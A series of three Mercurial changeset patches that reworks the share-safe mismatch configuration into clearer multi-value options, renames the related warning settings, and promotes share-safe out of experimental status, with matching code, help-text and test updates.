# HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610986040 -19800 # Mon Jan 18 21:37:20 2021 +0530 # Node ID cc3452d2dfa49c603055804f6fb80cd45ef25b1d # Parent 8788981c95f86877a26a15494aca6e382f897dfa share: rework config options to be much clearer and easier Recently I implemented various boolean configs which control how to behave when there is a share-safe mismatch between source and share repository. Mismatch means that source supports share-safe where as share does not or vice versa. However, while discussion and documentation we realized that it's too complicated and there are some combinations of values which makes no sense. We decided to introduce a config option with 4 possible values which makes controlling and understanding things easier. The config option `share.safe-mismatch.source-{not-}safe` can have following 4 values: * abort (default): error out if there is mismatch * allow: allow to work with respecting share source configuration * {up|down}grade-abort: try to {up|down}grade, if it fails, abort * {up|down}grade-allow: try to {up|down}grade, if it fails, continue in allow mode I am not sure if I can explain 3 config options which I deleted right now in just 5 lines which is a sign of how complex they became. No test changes demonstrate that functionality is same, only names have changed. Differential Revision: https://phab.mercurial-scm.org/D9785 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1098,21 +1098,6 @@ ) coreconfigitem( b'experimental', - b'sharesafe-auto-downgrade-shares', - default=False, -) -coreconfigitem( - b'experimental', - b'sharesafe-auto-upgrade-shares', - default=False, -) -coreconfigitem( - b'experimental', - b'sharesafe-auto-upgrade-fail-error', - default=False, -) -coreconfigitem( - b'experimental', b'sharesafe-warn-outdated-shares', default=True, ) @@ -1926,6 +1911,16 @@ default=b'identity', ) coreconfigitem( + b'share', + b'safe-mismatch.source-not-safe', + default=b'abort', +) +coreconfigitem( + b'share', + b'safe-mismatch.source-safe', + default=b'abort', +) +coreconfigitem( b'shelve', b'maxbackups', default=10, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1932,6 +1932,39 @@ Currently, only the rebase and absorb commands consider this configuration. (EXPERIMENTAL) +``share`` +--------- + +``safe-mismatch.source-safe`` + + Controls what happens when the shared repository does not use the + share-safe mechanism but its source repository does. + + Possible values are `abort` (default), `allow`, `upgrade-abort` and + `upgrade-abort`. + `abort`: Disallows running any command and aborts + `allow`: Respects the feature presence in the share source + `upgrade-abort`: tries to upgrade the share to use share-safe; + if it fails, aborts + `upgrade-allow`: tries to upgrade the share; if it fails, continue by + respecting the share source setting + +``safe-mismatch.source-not-safe`` + + Controls what happens when the shared repository uses the share-safe + mechanism but its source does not. + + Possible values are `abort` (default), `allow`, `downgrade-abort` and + `downgrade-abort`. + `abort`: Disallows running any command and aborts + `allow`: Respects the feature presence in the share source + `downgrade-abort`: tries to downgrade the share to not use share-safe; + if it fails, aborts + `downgrade-allow`: tries to downgrade the share to not use share-safe; + if it fails, continue by respecting the shared + source setting + + ``storage`` ----------- diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -575,8 +575,13 @@ and requirementsmod.SHARESAFE_REQUIREMENT not in _readrequires(sharedvfs, True) ): - if ui.configbool( - b'experimental', b'sharesafe-auto-downgrade-shares' + mismatch_config = ui.config( + b'share', b'safe-mismatch.source-not-safe' + ) + if mismatch_config in ( + b'downgrade-allow', + b'allow', + b'downgrade-abort', ): # prevent cyclic import localrepo -> upgrade -> localrepo from . import upgrade @@ -586,19 +591,38 @@ hgvfs, sharedvfs, requirements, + mismatch_config, ) - else: + elif mismatch_config == b'abort': raise error.Abort( _( b"share source does not support exp-sharesafe requirement" ) ) + else: + hint = _( + "run `hg help config.share.safe-mismatch.source-not-safe`" + ) + raise error.Abort( + _( + b"share-safe mismatch with source.\nUnrecognized" + b" value '%s' of `share.safe-mismatch.source-not-safe`" + b" set." + ) + % mismatch_config, + hint=hint, + ) else: requirements |= _readrequires(storevfs, False) elif shared: sourcerequires = _readrequires(sharedvfs, False) if requirementsmod.SHARESAFE_REQUIREMENT in sourcerequires: - if ui.configbool(b'experimental', b'sharesafe-auto-upgrade-shares'): + mismatch_config = ui.config(b'share', b'safe-mismatch.source-safe') + if mismatch_config in ( + b'upgrade-allow', + b'allow', + b'upgrade-abort', + ): # prevent cyclic import localrepo -> upgrade -> localrepo from . import upgrade @@ -607,14 +631,25 @@ hgvfs, storevfs, requirements, + mismatch_config, ) - else: + elif mismatch_config == b'abort': raise error.Abort( _( b'version mismatch: source uses share-safe' b' functionality while the current share does not' ) ) + else: + hint = _("run `hg help config.share.safe-mismatch.source-safe`") + raise error.Abort( + _( + b"share-safe mismatch with source.\nUnrecognized" + b" value '%s' of `share.safe-mismatch.source-safe` set." + ) + % mismatch_config, + hint=hint, + ) # The .hg/hgrc file may load extensions or contain config options # that influence repository construction. Attempt to load it and diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -241,7 +241,9 @@ upgrade_op.print_post_op_messages() -def upgrade_share_to_safe(ui, hgvfs, storevfs, current_requirements): +def upgrade_share_to_safe( + ui, hgvfs, storevfs, current_requirements, mismatch_config +): """Upgrades a share to use share-safe mechanism""" wlock = None store_requirements = localrepo._readrequires(storevfs, False) @@ -253,6 +255,10 @@ # add share-safe requirement as it will mark the share as share-safe diffrequires.add(requirementsmod.SHARESAFE_REQUIREMENT) current_requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) + # in `allow` case, we don't try to upgrade, we just respect the source + # state, update requirements and continue + if mismatch_config == b'allow': + return try: wlock = lockmod.trylock(ui, hgvfs, b'wlock', 0, 0) # some process might change the requirement in between, re-read @@ -271,7 +277,7 @@ scmutil.writerequires(hgvfs, diffrequires) ui.warn(_(b'repository upgraded to use share-safe mode\n')) except error.LockError as e: - if ui.configbool(b'experimental', b'sharesafe-auto-upgrade-fail-error'): + if mismatch_config == b'upgrade-abort': raise error.Abort( _(b'failed to upgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) @@ -291,6 +297,7 @@ hgvfs, sharedvfs, current_requirements, + mismatch_config, ): """Downgrades a share which use share-safe to not use it""" wlock = None @@ -302,6 +309,8 @@ source_requirements -= requirementsmod.WORKING_DIR_REQUIREMENTS current_requirements |= source_requirements current_requirements.remove(requirementsmod.SHARESAFE_REQUIREMENT) + if mismatch_config == b'allow': + return try: wlock = lockmod.trylock(ui, hgvfs, b'wlock', 0, 0) @@ -319,12 +328,13 @@ scmutil.writerequires(hgvfs, current_requirements) ui.warn(_(b'repository downgraded to not use share-safe mode\n')) except error.LockError as e: - # raise error right away because if downgrade failed, we cannot load - # the repository because it does not have complete set of requirements - raise error.Abort( - _(b'failed to downgrade share, got error: %s') - % stringutil.forcebytestr(e.strerror) - ) + # If upgrade-abort is set, abort when upgrade fails, else let the + # process continue as `upgrade-allow` is set + if mismatch_config == b'downgrade-abort': + raise error.Abort( + _(b'failed to downgrade share, got error: %s') + % stringutil.forcebytestr(e.strerror) + ) finally: if wlock: wlock.release() diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -486,12 +486,12 @@ Testing automatic downgrade of shares when config is set $ touch ../ss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config experimental.sharesafe-auto-downgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort abort: failed to downgrade share, got error: Lock held [255] $ rm ../ss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config experimental.sharesafe-auto-downgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../ss-share --config share.safe-mismatch.source-not-safe=downgrade-abort repository downgraded to not use share-safe mode @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | @@ -533,26 +533,31 @@ [255] Check that if lock is taken, upgrade fails but read operation are successful + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgra + abort: share-safe mismatch with source. + Unrecognized value 'upgra' of `share.safe-mismatch.source-safe` set. + (run `hg help config.share.safe-mismatch.source-safe`) + [255] $ touch ../nss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow failed to upgrade share, got error: Lock held @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true --config experimental.sharesafe-warn-outdated-shares=false + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config experimental.sharesafe-warn-outdated-shares=false @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true --config experimental.sharesafe-auto-upgrade-fail-error=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort abort: failed to upgrade share, got error: Lock held [255] $ rm ../nss-share/.hg/wlock - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config experimental.sharesafe-auto-upgrade-shares=true + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-abort repository upgraded to use share-safe mode @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610692687 -19800 # Fri Jan 15 12:08:07 2021 +0530 # Node ID 2eb5fe13461b81dc20468885deeb7cbe44240eea # Parent cc3452d2dfa49c603055804f6fb80cd45ef25b1d share: rename share-safe warning config Config introduced in previous patch was `share.source-safe-mismatch`. Let's rename the warn as `share.source-safe-mismatch.warn`. While we are here, made sure we have different configs for upgrade and downgrade. Differential Revision: https://phab.mercurial-scm.org/D9786 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1098,11 +1098,6 @@ ) coreconfigitem( b'experimental', - b'sharesafe-warn-outdated-shares', - default=True, -) -coreconfigitem( - b'experimental', b'single-head-per-branch', default=False, ) @@ -1921,6 +1916,16 @@ default=b'abort', ) coreconfigitem( + b'share', + b'safe-mismatch.source-not-safe.warn', + default=True, +) +coreconfigitem( + b'share', + b'safe-mismatch.source-safe.warn', + default=True, +) +coreconfigitem( b'shelve', b'maxbackups', default=10, diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1965,6 +1965,16 @@ source setting +``safe-mismatch.source-safe.warn`` + Shows a warning on operations if the shared repository does not use + share-safe, but the source repository does. + (default: True) + +``safe-mismatch.source-not-safe.warn`` + Shows a warning on operations if the shared repository uses share-safe, + but the source repository does not. + (default: True) + ``storage`` ----------- diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -575,6 +575,9 @@ and requirementsmod.SHARESAFE_REQUIREMENT not in _readrequires(sharedvfs, True) ): + mismatch_warn = ui.configbool( + b'share', b'safe-mismatch.source-not-safe.warn' + ) mismatch_config = ui.config( b'share', b'safe-mismatch.source-not-safe' ) @@ -592,6 +595,7 @@ sharedvfs, requirements, mismatch_config, + mismatch_warn, ) elif mismatch_config == b'abort': raise error.Abort( @@ -618,6 +622,9 @@ sourcerequires = _readrequires(sharedvfs, False) if requirementsmod.SHARESAFE_REQUIREMENT in sourcerequires: mismatch_config = ui.config(b'share', b'safe-mismatch.source-safe') + mismatch_warn = ui.configbool( + b'share', b'safe-mismatch.source-safe.warn' + ) if mismatch_config in ( b'upgrade-allow', b'allow', @@ -632,6 +639,7 @@ storevfs, requirements, mismatch_config, + mismatch_warn, ) elif mismatch_config == b'abort': raise error.Abort( diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -242,7 +242,12 @@ def upgrade_share_to_safe( - ui, hgvfs, storevfs, current_requirements, mismatch_config + ui, + hgvfs, + storevfs, + current_requirements, + mismatch_config, + mismatch_warn, ): """Upgrades a share to use share-safe mechanism""" wlock = None @@ -282,7 +287,7 @@ _(b'failed to upgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) ) - elif ui.configbool(b'experimental', b'sharesafe-warn-outdated-shares'): + elif mismatch_warn: ui.warn( _(b'failed to upgrade share, got error: %s\n') % stringutil.forcebytestr(e.strerror) @@ -298,6 +303,7 @@ sharedvfs, current_requirements, mismatch_config, + mismatch_warn, ): """Downgrades a share which use share-safe to not use it""" wlock = None @@ -335,6 +341,11 @@ _(b'failed to downgrade share, got error: %s') % stringutil.forcebytestr(e.strerror) ) + elif mismatch_warn: + ui.warn( + _(b'failed to downgrade share, got error: %s\n') + % stringutil.forcebytestr(e.strerror) + ) finally: if wlock: wlock.release() diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -546,7 +546,7 @@ o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo - $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config experimental.sharesafe-warn-outdated-shares=false + $ hg log -GT "{node}: {desc}\n" -R ../nss-share --config share.safe-mismatch.source-safe=upgrade-allow --config share.safe-mismatch.source-safe.warn=False @ f63db81e6dde1d9c78814167f77fb1fb49283f4f: added bar | o f3ba8b99bb6f897c87bbc1c07b75c6ddf43a4f77: added foo # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610977609 -19800 # Mon Jan 18 19:16:49 2021 +0530 # Node ID 4b0192f592cf1962576ef6b6bc688bd11ac2cbd6 # Parent 2eb5fe13461b81dc20468885deeb7cbe44240eea share: move share safe functionality out of experimental The share-safe functionality is complete and all configuration options are implemented. The behavior is well discussed on mailing list and in reviews. Let's unmark this as experimental to solve a chichen and egg issue. Differential Revision: https://phab.mercurial-scm.org/D9823 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1272,9 +1272,8 @@ ) coreconfigitem( b'format', - b'exp-share-safe', + b'use-share-safe', default=False, - experimental=True, ) coreconfigitem( b'format', diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -914,6 +914,12 @@ Disabled by default. +``use-share-safe`` + Enable or disable the "share-safe" functionality, which enables shares + to read requirements and configuration of its source repository. + + Disabled by default. + ``usestore`` Enable or disable the "store" repository format which improves compatibility with systems that fold case or otherwise mangle diff --git a/mercurial/helptext/internals/requirements.txt b/mercurial/helptext/internals/requirements.txt --- a/mercurial/helptext/internals/requirements.txt +++ b/mercurial/helptext/internals/requirements.txt @@ -159,10 +159,6 @@ exp-sharesafe ============= -NOTE: This requirement is for internal development only. The semantics are not -frozed yet, the feature is experimental. It's not advised to use it for any -production repository yet. - Represents that the repository can be shared safely. Requirements and config of the source repository will be shared. Requirements are stored in ``.hg/store`` instead of directly in ``.hg/`` where @@ -172,5 +168,5 @@ Support for this requirement was added in Mercurial 5.7 (released February 2021). The requirement will only be present on repositories that have -opted in to this format (by having ``format.exp-share-safe=true`` set when +opted in to this format (by having ``format.use-share-safe=true`` set when they were created). diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3474,7 +3474,7 @@ # if share-safe is enabled, let's create the new repository with the new # requirement - if ui.configbool(b'format', b'exp-share-safe'): + if ui.configbool(b'format', b'use-share-safe'): requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) return requirements @@ -3513,7 +3513,7 @@ if requirementsmod.SHARESAFE_REQUIREMENT in requirements: ui.warn( _( - b"ignoring enabled 'format.exp-share-safe' config because " + b"ignoring enabled 'format.use-share-safe' config because " b"it is incompatible with disabled 'format.usestore'" b" config\n" ) diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -55,7 +55,7 @@ # A repository with share implemented safely. The repository has different # store and working copy requirements i.e. both `.hg/requires` and # `.hg/store/requires` are present. -SHARESAFE_REQUIREMENT = b'exp-sharesafe' +SHARESAFE_REQUIREMENT = b'share-safe' # List of requirements which are working directory specific # These requirements cannot be shared between repositories if they diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -237,7 +237,7 @@ @registerformatvariant class sharesafe(requirementformatvariant): - name = b'exp-sharesafe' + name = b'share-safe' _requirement = requirements.SHARESAFE_REQUIREMENT default = False diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -696,7 +696,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no yes no persistent-nodemap: no no no diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -37,7 +37,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -51,7 +51,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -419,7 +419,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -445,7 +445,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no @@ -473,7 +473,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes yes no persistent-nodemap: no no no diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1553,6 +1553,8 @@ "use-persistent-nodemap" + "use-share-safe" + "usestore" "sparse-revlog" diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -37,7 +37,7 @@ fncache: yes dotencode: yes generaldelta: yes - exp-sharesafe: no + share-safe: no sparserevlog: yes sidedata: no persistent-nodemap: yes @@ -556,7 +556,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: yes no no @@ -592,7 +592,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no yes no diff --git a/tests/test-share-bookmarks.t b/tests/test-share-bookmarks.t --- a/tests/test-share-bookmarks.t +++ b/tests/test-share-bookmarks.t @@ -3,7 +3,7 @@ #if safe $ echo "[format]" >> $HGRCPATH - $ echo "exp-share-safe = True" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH #endif $ echo "[extensions]" >> $HGRCPATH @@ -290,4 +290,4 @@ $ hg init brokenrepo --config format.bookmarks-in-store=True --config format.usestore=false ignoring enabled 'format.bookmarks-in-store' config beacuse it is incompatible with disabled 'format.usestore' config - ignoring enabled 'format.exp-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) + ignoring enabled 'format.use-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -4,7 +4,7 @@ > [extensions] > share = > [format] - > exp-share-safe = True + > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow > EOF @@ -14,7 +14,7 @@ $ hg init source $ cd source $ cat .hg/requires - exp-sharesafe + share-safe $ cat .hg/store/requires dotencode fncache @@ -24,10 +24,10 @@ store $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store @@ -47,24 +47,24 @@ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd shared1 $ cat .hg/requires - exp-sharesafe + share-safe shared $ hg debugrequirements -R ../source dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe shared sparserevlog store @@ -214,7 +214,7 @@ upgrade will perform the following actions: requirements - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, share-safe, sparserevlog, store added: revlog-compression-zstd processed revlogs: @@ -240,8 +240,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, exp-sharesafe, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlogv1, share-safe, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, share-safe, sparserevlog, store (zstd !) added: persistent-nodemap processed revlogs: @@ -310,7 +310,7 @@ Test that upgrading using debugupgraderepo works ================================================= - $ hg init non-share-safe --config format.exp-share-safe=false + $ hg init non-share-safe --config format.use-share-safe=false $ cd non-share-safe $ hg debugrequirements dotencode @@ -345,7 +345,7 @@ $ hg debugupgraderepo -q requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -357,7 +357,7 @@ requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -368,15 +368,15 @@ $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ cat .hg/requires - exp-sharesafe + share-safe $ cat .hg/store/requires dotencode @@ -419,13 +419,13 @@ > [extensions] > share = > [format] - > exp-share-safe = False + > use-share-safe = False > EOF $ hg debugupgraderepo -q requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - removed: exp-sharesafe + removed: share-safe processed revlogs: - all-filelogs @@ -437,7 +437,7 @@ requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - removed: exp-sharesafe + removed: share-safe processed revlogs: - all-filelogs @@ -507,12 +507,12 @@ Testing automatic upgrade of shares when config is set - $ hg debugupgraderepo -q --run --config format.exp-share-safe=True + $ hg debugupgraderepo -q --run --config format.use-share-safe=True upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store - added: exp-sharesafe + added: share-safe processed revlogs: - all-filelogs @@ -522,10 +522,10 @@ repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements dotencode - exp-sharesafe fncache generaldelta revlogv1 + share-safe sparserevlog store $ hg log -GT "{node}: {desc}\n" -R ../nss-share diff --git a/tests/test-share.t b/tests/test-share.t --- a/tests/test-share.t +++ b/tests/test-share.t @@ -2,7 +2,7 @@ #if safe $ echo "[format]" >> $HGRCPATH - $ echo "exp-share-safe = True" >> $HGRCPATH + $ echo "use-share-safe = True" >> $HGRCPATH #endif $ echo "[extensions]" >> $HGRCPATH @@ -281,7 +281,7 @@ Test sharing a repository which was created with store requirement disable $ hg init nostore --config format.usestore=false - ignoring enabled 'format.exp-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) + ignoring enabled 'format.use-share-safe' config because it is incompatible with disabled 'format.usestore' config (safe !) $ hg share nostore sharednostore abort: cannot create shared repository as source was created with 'format.usestore' config disabled [255] diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -54,7 +54,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -67,7 +67,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no yes no persistent-nodemap: no no no @@ -86,7 +86,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes no no persistent-nodemap: no no no @@ -99,7 +99,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes no no persistent-nodemap: no no no diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -56,7 +56,7 @@ fncache: yes dotencode: yes generaldelta: yes - exp-sharesafe: no + share-safe: no sparserevlog: yes sidedata: no persistent-nodemap: no @@ -69,7 +69,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -82,7 +82,7 @@ fncache: yes no yes dotencode: yes no yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -95,7 +95,7 @@ [formatvariant.name.mismatchconfig|fncache: ][formatvariant.repo.mismatchconfig| yes][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.mismatchconfig|dotencode: ][formatvariant.repo.mismatchconfig| yes][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|exp-sharesafe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -126,7 +126,7 @@ { "config": false, "default": false, - "name": "exp-sharesafe", + "name": "share-safe", "repo": false }, { @@ -301,7 +301,7 @@ fncache: no dotencode: no generaldelta: no - exp-sharesafe: no + share-safe: no sparserevlog: no sidedata: no persistent-nodemap: no @@ -314,7 +314,7 @@ fncache: no yes yes dotencode: no yes yes generaldelta: no yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: no yes yes sidedata: no no no persistent-nodemap: no no no @@ -327,7 +327,7 @@ fncache: no yes yes dotencode: no yes yes generaldelta: no no yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: no no yes sidedata: no no no persistent-nodemap: no no no @@ -340,7 +340,7 @@ [formatvariant.name.mismatchconfig|fncache: ][formatvariant.repo.mismatchconfig| no][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.mismatchconfig|dotencode: ][formatvariant.repo.mismatchconfig| no][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|exp-sharesafe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|sidedata: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] @@ -1297,7 +1297,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1333,7 +1333,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1372,7 +1372,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: no no no persistent-nodemap: no no no @@ -1415,7 +1415,7 @@ fncache: yes yes yes dotencode: yes yes yes generaldelta: yes yes yes - exp-sharesafe: no no no + share-safe: no no no sparserevlog: yes yes yes sidedata: yes no no 